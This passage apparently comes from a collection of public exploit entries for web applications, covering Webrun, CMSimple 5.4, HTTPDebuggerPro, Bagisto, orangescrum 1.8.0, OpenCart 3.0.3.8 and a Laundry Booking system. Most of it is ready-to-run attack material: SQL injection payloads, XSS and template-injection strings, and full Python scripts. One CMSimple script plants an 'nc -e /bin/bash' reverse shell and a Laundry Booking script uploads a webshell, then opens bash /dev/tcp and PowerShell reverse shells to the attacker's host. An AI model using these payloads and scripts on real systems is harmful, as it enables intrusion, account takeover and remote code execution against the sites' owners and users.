2. Now put the below payload in the 'Search' field.
*Payload:* 123' AND (SELECT 7169 FROM (SELECT(SLEEP(4)))abhi) AND 'x'='x
3. The server accepted our payload and the response got delayed by 4 seconds.

*IMPACT:*
As the vulnerable parameter is an external parameter (credentials not required), an attacker can dump the database of the application remotely.

Suggested Mitigation/Remediation Actions
Parameterized queries should be used to separate the command and data portions of the intended query to the database. These queries prevent an attacker from tampering with the query logic and extending a concatenated database query string. Code reviews should be conducted to identify any additional areas where the application or other applications in the organization are vulnerable to this attack. Additionally, input validation should be enforced on the server side in order to ensure that only expected data is sent in queries. Where possible, security-specific libraries should be used in order to provide an additional layer of protection.
  15. # Exploit Title: Webrun 3.6.0.42 - 'P_0' SQL Injection
# Google Dork: intitle:"Webrun 3.6.0.42"
# Date: 23/11/2021
# Exploit Author: Vinicius Alves
# Vendor Homepage: https://softwell.com.br/
# Version: 3.6.0.42
# Tested on: Kali Linux 2021.3
# CVE: CVE-2021-43650

=-=-=-= Description =-=-=-=
Webrun version 3.6.0.42 is vulnerable to SQL Injection, applied to the P_0 parameter used to set the username during the login process.

=-=-=-= Exploiting =-=-=-=
In the post request, change the P_0 value to the following payload:

121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd

You will see some information like below:

interactionError('ERRO: sintaxe de entrada é inválida para tipo numeric: \"qvvxq1qbzbq\"', null, null, null, '<b>

=-=-=-= POC =-=-=-=
If the return has the value 'qvvxq1qbzbq', you will be able to successfully exploit this.

See an example of the complete POST parameter:

action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd
  16. # Exploit Title: CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)
# Date: 11/15/2021
# Exploit Author: S1lv3r
# Vendor Homepage: https://www.cmsimple.org/en/
# Software Link: https://www.cmsimple.org/en/
# Version: CMSimple 5.4
# Tested on: CMSimple 5.4
# writeup:
# https://github.com/iiSiLvEr/CMSimple5.4-Vulnerabilities

#!/usr/bin/python3
import requests
import threading
import datetime
import sys
from bs4 import BeautifulSoup

x = datetime.datetime.now()
addSeconds = datetime.timedelta(0, 10)
Time = x + addSeconds
proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080", }


def Login():
    try:
        global Time
        s = requests.Session()
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        data = f'login=true&selected=Welcome_to_CMSimple_5&User={User}&passwd={Password}&submit=Login'
        response = s.post(RHOST, data=data, headers=headers, verify=False)  # , proxies=proxies
        if response.cookies['passwd']:
            print("(+) Successfully Logged In With " + User + ":" + Password)
            cookies = response.cookies
            params = (('file', 'config'), ('action', 'array'),)
            response = s.get(RHOST, cookies=cookies, params=params, verify=False)
            soup = BeautifulSoup(response.text, 'lxml')
            CsrfValue = soup.find('input', attrs={'name': 'csrf_token'})['value']
            print("(+) Get CSRF Token : [ " + CsrfValue + " ]")
            data = f'csrf_token={CsrfValue}&functions_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_S1lv3r&form=array&file=config&action=save'
            response = s.post(RHOST, headers=headers, cookies=cookies, data=data, verify=False)
            print("(+) Changing Functions file Done ")
            print("(+) Check Your nc listener on " + LPORT)
    except Exception as error:
        print("Error, Exiting;( ")
        print(error)
        pass


def fuzz():
    while True:
        try:
            sessionName = "S1lv3r"
            cookies = {'PHPSESSID': sessionName}
            files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php passthru("nc ' + LHOST + ' ' + LPORT + ' -e /bin/bash");?>'),
                     'file': ('Anything', 'S1lv3r' * 100, 'application/octet-stream')}
            x = requests.post(RHOST, files=files, cookies=cookies, verify=False)  # , proxies=proxies
        except Exception as error:
            print(error)
            exit()


def main():
    print("\n(+) CMSimple LFI to RCE \n")
    Login()
    threads = []
    for _ in range(20):
        t = threading.Thread(target=fuzz)
        t.start()
        threads.append(t)
    for thread in threads:
        thread.join()


if __name__ == "__main__":
    if len(sys.argv) <= 5:
        print("\n(-) Usage: {} <RHOST> <LHOST> <LPORT> <USER> <PASS>".format(sys.argv[0]))
        print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))
        print("\n(=) SiLvEr \n")
        exit()
    else:
        RHOST = sys.argv[1]
        LHOST = sys.argv[2]
        LPORT = sys.argv[3]
        User = sys.argv[4]
        Password = sys.argv[5]
        main()
  17. # Exploit Title: HTTPDebuggerPro 9.11 - Unquoted Service Path
# Exploit Author: Aryan Chehreghani
# Date: 23/11/2021
# Vendor Homepage: https://www.httpdebugger.com
# Software Link: https://www.httpdebugger.com/download.html
# Version: 9.11
# Tested on: Windows 10 x64

SERVICE_NAME: HTTPDebuggerPro
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerSvc.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : HTTP Debugger Pro
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
  18. # Exploit Title: Bagisto 1.3.3 - Client-Side Template Injection
# Date: 11-25-2021
# Exploit Author: Mohamed Abdellatif Jaber
# Vendor Homepage: https://bagisto.com/en/
# Software Link: https://github.com/bagisto/bagisto
# Version: v1.3.3
# Tested on: [windows | chrome | firefox ]

Exploit:
1- Register an account and log in to your account
2- Go to your profile and edit name, address
3- Put this payload: {{constructor.constructor('alert(document.domain)')()}}
4- Admin or anyone who views the order or your profile will execute arbitrary JS code.

ref: https://portswigger.net/kb/issues/00200308_client-side-template-injection
  19. # Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)
# Date: 28/11/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.orangescrum.org/
# Software Link: https://www.orangescrum.org/
# Version: 1.8.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### SQL Injection
# Authenticated user
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example vuln parameters:
* project_id
* old_project_id
* uuid
* uniqid
* projid
* id
* caseno
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
## Example
-----------------------------------------------------------------------------------------------------------------------
Req old_project_id=1' - error
-----------------------------------------------------------------------------------------------------------------------
POST /orangescrum/easycases/move_task_to_project HTTP/1.1
Origin: http://127.0.0.1
Content-Length: 64
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:80
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Connection: close
X-Requested-With: XMLHttpRequest
Sec-Fetch-Mode: cors
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2
Referer: http://127.0.0.1/orangescrum/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Dest: empty

project_id=3&old_project_id=2'&case_id=2&case_no=1&is_multiple=0
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 500 Internal Server Error
Date: Sun, 28 Nov 2021 12:42:30 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Content-Length: 132182
Vary: User-Agent
Expires: access 12 month
Connection: close

[...]
-----------------------------------------------------------------------------------------------------------------------
Req old_project_id=1'' - not error
-----------------------------------------------------------------------------------------------------------------------
POST /orangescrum/easycases/move_task_to_project HTTP/1.1
Origin: http://127.0.0.1
Content-Length: 66
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:80
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Connection: close
X-Requested-With: XMLHttpRequest
Sec-Fetch-Mode: cors
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2
Referer: http://127.0.0.1/orangescrum/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Dest: empty

project_id=3&old_project_id=2'';&case_id=2&case_no=1&is_multiple=0
-----------------------------------------------------------------------------------------------------------------------
Res
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 12:51:23 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Vary: User-Agent
Expires: access 12 month
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

0
  20. # Exploit Title: orangescrum 1.8.0 - Privilege escalation (Authenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.orangescrum.org/
# Software Link: https://www.orangescrum.org/
# Version: 1.8.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### Privilege escalation
# The user must be assigned to the project with the account he wants to take over
# The vulnerabilities in the application allow for:
* Taking over any account with which the project is assigned
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example
1. Go to the dashboard
2. Go to the page source view
3. Find "var PUSERS" in the source
4. Copy the victim's "uniq_id"
5. Change the cookie "USER_UNIQ" to the victim's "USER_UNIQ" from the page source
6. After refreshing the page, you are logged in to the victim's account
  21. # Exploit Title: orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)
# Date: 28/11/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.orangescrum.org/
# Software Link: https://www.orangescrum.org/
# Version: 1.8.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Reflected
# Authenticated user
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example XSS Reflected
Param: projid
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /orangescrum/easycases/edit_reply HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 64
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/orangescrum/dashboard
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; CURRENT_FILTER=cases
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

id=5&reply_flag=1&projid=1zxcvczxzxcv"><script>alert(1)</script>
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 13:28:57 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
Content-Length: 1114
Vary: User-Agent
Expires: access 12 month
Connection: close
Content-Type: text/html; charset=UTF-8

<table cellpadding="0" cellspacing="0" class="edit_rep_768 col-lg-12">
<tr>
<td>
<textarea name="edit_reply_txtbox5" id="edit_reply_txtbox5" rows="3" class="reply_txt_ipad col-lg-12">
xczcxz"/><b>bb</b>bbxczcxz"/>&ltxczcxz"/><b>bb</b>bb;b>bb</b>bbxczcxz"/><b>bb</b>bb
</textarea>
</td>
</tr>
<tr>
<td align="right">
<div id="edit_btn5" class="fr">
<button type="button" value="Save" style="margin:5px;padding:3px 32px 3px 32px;" class="btn btn_blue" onclick="save_editedvalue_reply(2,5,1zxcvczxzxcv"><script>alert(1)</script>,'c64271510399996f611739b [...]

## Example XSS Stored
Example vuln parameters:
* CS_message
* name
* data[User][email]
-----------------------------------------------------------------------------------------------------------------------
Param: CS_message
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /orangescrum/easycases/ajaxpostcase HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 393
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/orangescrum/dashboard/?project=3966c2c5cc3745d161640d07450d682c
Cookie: language=en-gb; currency=USD; CAKEPHP=j27a7es1lv1ln77gpngicqshe4; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; CURRENT_FILTER=cases; TASK_TYPE_IN_DASHBOARD=1; LAST_CREATED_PROJ=14
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

pid=14&CS_project_id=8f4adc0f496a3738f04d629be909488d&CS_istype=2&CS_title=&CS_type_id=15&CS_priority=1&CS_message=zxcvbzz"/><img%20src=x%20onmouseover=alert(1)>axcbv&CS_assign_to=1&CS_due_date=&CS_milestone=&postdata=Post&pagename=dashboard&emailUser%5B%5D=1&CS_id=2678&CS_case_no=1&datatype=1&CS_legend=2&prelegend=1&hours=0&estimated_hours=0&completed=0&taskid=0&task_uid=0&editRemovedFile=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 13:51:29 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Vary: User-Agent
Expires: access 12 month
Content-Length: 698
Connection: close
Content-Type: text/html; charset=UTF-8

{"success":"success","pagename":"dashboard","formdata":"8f4adc0f496a3738f04d629be909488d","postParam":"Post","caseUniqId":"eb8671bf1e20702b7793b11152e9ff32","format":2,"allfiles":null,"caseNo":"1","emailTitle":"aaaaaaaaaaaaaaz\"\/><img src=x onmouseover=alert(1)>a","emailMsg":"zxcvbzz\"\/><img src=x onmouseover=alert(1)> [...]
  22. # Exploit Title: opencart 3.0.3.8 - Session Injection
# Date: 28/11/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/
# Version: 3.0.3.8
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### Session Fixation / injection
The session cookie "OCSESSID" is improperly processed. An attacker can set any cookie value and the server sets this value. Because of that, the application has a session injection and session fixation vulnerability.
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example
Modify cookie "OCSESSID" value:
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/opencart-3.0.3.8/
Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------------------------------------------------------------------------------------------------
The server sets the attacker's value:
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 15:16:06 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: PHP/8.0.11
Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18944

[...]
  23. # Exploit Title: Laundry Booking Management System 1.0 - Remote Code Execution (RCE)
# Date: 29/11/2021
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/laundry_sourcecode.zip
# Version: 1.0
# Tested on: Windows 7 and Ubuntu 21.10
# Vulnerability: It's possible to create a user without being authenticated;
# in this request you can upload a simple webshell which will be used to get a
# reverse shell

import re, sys, argparse, requests, time, os
import subprocess, pyfiglet

ascii_banner = pyfiglet.figlet_format("Laundry")
print(ascii_banner)
print(" Booking Management System\n")
print("----[Broken Access Control to RCE]----\n")


class Exploit:
    def __init__(self, target, shell_name, localhost, localport, os):
        self.target = target
        self.shell_name = shell_name
        self.localhost = localhost
        self.localport = localport
        self.LHL = '/'.join([localhost, localport])
        self.HPW = "'" + localhost + "'" + ',' + localport
        self.os = os
        self.session = requests.Session()
        #self.http_proxy = "http://127.0.0.1:8080"
        #self.https_proxy = "https://127.0.0.1:8080"
        #self.proxies = {"http" : self.http_proxy,
        #                "https" : self.https_proxy}
        self.headers = {'Cookie': 'PHPSESSID= Broken Access Control'}

    def create_user(self):
        url = self.target + "/pages/save_user.php"
        data = {
            "fname": "bypass",
            "email": "bypass@bypass.com",
            "password": "password",
            "group_id": "2",
        }
        #Creates user "bypass" and uploads a simple webshell without authentication
        request = self.session.post(url, data=data, headers=self.headers,
                                    files={"image": (self.shell_name + '.php', "<?=`$_GET[cmd]`?>")})
        time.sleep(3)
        if (request.status_code == 200):
            print('[*] The user and webshell were created\n')
        else:
            print('Something was wrong...!')

    def execute_shell(self):
        if self.os == "linux":
            time.sleep(3)
            print("[*] Starting reverse shell\n")
            subprocess.Popen(["nc", "-nvlp", self.localport])
            time.sleep(3)
            #Use a payload in bash to get a reverse shell
            payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/' + self.LHL + '+0>%261"'
            execute_command = self.target + '/uploadImage/Profile/' + self.shell_name + '.php?cmd=' + payload
            try:
                request_rce = requests.get(execute_command)
                print(request_rce.text)
            except requests.exceptions.ReadTimeout:
                pass
        elif self.os == "windows":
            time.sleep(3)
            print("[*] Starting reverse shell\n")
            subprocess.Popen(["nc", "-nvlp", self.localport])
            time.sleep(3)
            #Use a payload in powershell to get a reverse shell
            payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient(""" + self.HPW + """)%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0) {%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
            execute_command = self.target + '/uploadImage/Profile/' + self.shell_name + '.php?cmd=' + payload
            try:
                request_rce = requests.get(execute_command)
                print(request_rce.text)
            except requests.exceptions.ReadTimeout:
                pass
        else:
            print('Windows or linux')


def get_args():
    parser = argparse.ArgumentParser(description='Laundry Booking Management System')
    parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url')
    parser.add_argument('-s', '--shell_name', dest="shell_name", required=True, action='store', help='shell_name')
    parser.add_argument('-l', '--localhost', dest="localhost", required=True, action='store', help='local host')
    parser.add_argument('-p', '--localport', dest="localport", required=True, action='store', help='local port')
    parser.add_argument('-os', '--os', choices=['linux', 'windows'], dest="os", required=True, action='store',
                        help='linux,windows')
    args = parser.parse_args()
    return args


args = get_args()
target = args.target
shell_name = args.shell_name
localhost = args.localhost
localport = args.localport

xp = Exploit(target, shell_name, localhost, localport, args.os)
xp.create_user()
xp.execute_shell()

#Example, vulnerable software installed on windows: python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os windows
